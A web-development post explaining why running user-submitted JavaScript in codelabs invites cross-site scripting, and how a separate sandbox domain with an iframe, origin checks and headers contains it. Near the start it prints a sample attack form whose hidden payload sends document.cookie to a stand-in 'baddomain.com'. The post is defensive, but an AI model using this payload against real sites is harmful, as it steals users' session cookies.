Under normal circumstances we disallow any JavaScript in user-entered input from executing, because it can lead to cross-site scripting (XSS). When we build online JavaScript codelabs, however, we actually want to execute JavaScript entered by the user.
If we allow that JavaScript to execute on the site itself (same domain), it opens the site to an XSS attack. Any bad domain can create a form with the JavaScript in a hidden input and submit it to our site. That JavaScript can then send our site's cookies to the bad domain. Here is sample code a bad domain/site could use:
<form action="http://www.yourgoodsite.com/blah/blah/" method=post>
  <input type=hidden name=data value='<script>window.open("http://baddomain.com/?stolen_cookie=" + document.cookie)</script>' />
  <input type=submit value=submit>
</form>
This creates a form on the bad domain with the JavaScript in a hidden field. Since your site allows JavaScript execution, when the user clicks the submit button that JavaScript runs on your site, with access to your site's cookies.
Solution
One possible solution is to register and set up a new domain, www.yourgoodsite2.com, and allow JavaScript execution only on that domain. Don't use this domain for any other purpose, so there is nothing worth stealing (cookies, etc.) from it; the browser's same-origin policy keeps script running on www.yourgoodsite2.com from reading cookies or page content belonging to www.yourgoodsite.com. Here is part of the HTML form code for this:
<div>
  <form action="http://www.yourgoodsite2.com/blah/blah/" method="post" target="srctarget" onsubmit="return srcsubmit();">
    <textarea name="data"></textarea>
    <input type="submit" value="Run" />
  </form>
</div>
<div>
  <iframe id="srctarget" name="srctarget" src="http://www.yourgoodsite2.com/blah/blah/" height="240" width="320"></iframe>
</div>
Note that the form code resides on the main website (www.yourgoodsite.com), but the rendered outcome is displayed in an iframe served from www.yourgoodsite2.com.
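As an added example (not code from the original post), here is how both halves of the separate-domain setup can be wired up in JavaScript: the main site's onsubmit check makes sure the form really posts to the sandbox origin and never to the main origin, and the sandbox side wraps the submitted code in a page that sets no cookies and may only be framed by the main site. MAIN_ORIGIN, SANDBOX_ORIGIN, the srcsubmit implementation, buildSandboxPage and handleRunRequest are all assumptions for illustration.

```javascript
// Added example; names below are assumptions, not the post's own code.
const MAIN_ORIGIN = "http://www.yourgoodsite.com";     // holds the codelab UI and session cookies
const SANDBOX_ORIGIN = "http://www.yourgoodsite2.com"; // throwaway origin that runs user code

// Main-site check: only let the form post if its action resolves to the sandbox
// origin. A relative or misconfigured action would otherwise run user code on the
// main origin, where the session cookie lives.
function isSandboxAction(actionUrl) {
  let target;
  try {
    target = new URL(actionUrl, MAIN_ORIGIN); // relative URLs resolve against the main site
  } catch (e) {
    return false;
  }
  return target.origin === SANDBOX_ORIGIN && target.origin !== MAIN_ORIGIN;
}

// Assumed implementation of the srcsubmit() handler referenced by the form.
function srcsubmit(form) {
  return isSandboxAction(form.action);
}

// Sandbox side: wrap the submitted code in a minimal page. The code is meant to
// run as script, so the only escaping needed is "</script", which would otherwise
// end the script element early and let the text inject markup into the page.
function buildSandboxPage(userCode) {
  const safeCode = String(userCode).replace(/<\/script/gi, "<\\/script");
  return [
    "<!DOCTYPE html>",
    "<html><head><meta charset=\"utf-8\"><title>Run</title></head>",
    "<body><pre id=\"out\"></pre>",
    "<script>" + safeCode + "</script>",
    "</body></html>",
  ].join("\n");
}

// Response headers for the sandbox origin: no Set-Cookie ever, no caching, and
// only the main site is allowed to frame the result.
function sandboxHeaders() {
  return {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": "frame-ancestors " + MAIN_ORIGIN,
    "Cache-Control": "no-store",
  };
}

// Handle the POST from the form. Refuses to run anything unless the request
// actually arrived at the sandbox host, so the same handler can never be reached
// through the main site's hostname by mistake.
function handleRunRequest(hostHeader, formBody) {
  if (hostHeader !== new URL(SANDBOX_ORIGIN).host) {
    return { status: 403, headers: { "Content-Type": "text/plain" }, body: "wrong host" };
  }
  const params = new URLSearchParams(formBody); // body of application/x-www-form-urlencoded POST
  const code = params.get("data") || "";
  return { status: 200, headers: sandboxHeaders(), body: buildSandboxPage(code) };
}

// Constructed sample request, as the form in the post would send it.
const sampleBody = "data=" + encodeURIComponent("document.getElementById('out').textContent = 1 + 1;");
const sampleResponse = handleRunRequest("www.yourgoodsite2.com", sampleBody);
console.log(sampleResponse.status, sampleResponse.headers["Content-Security-Policy"]);
```

The Host check and the frame-ancestors header are the two places where the separate-domain design is most easily undone by configuration drift (a vhost that answers for both names, or a page that any site can embed), so they are worth enforcing in code rather than only in the deployment.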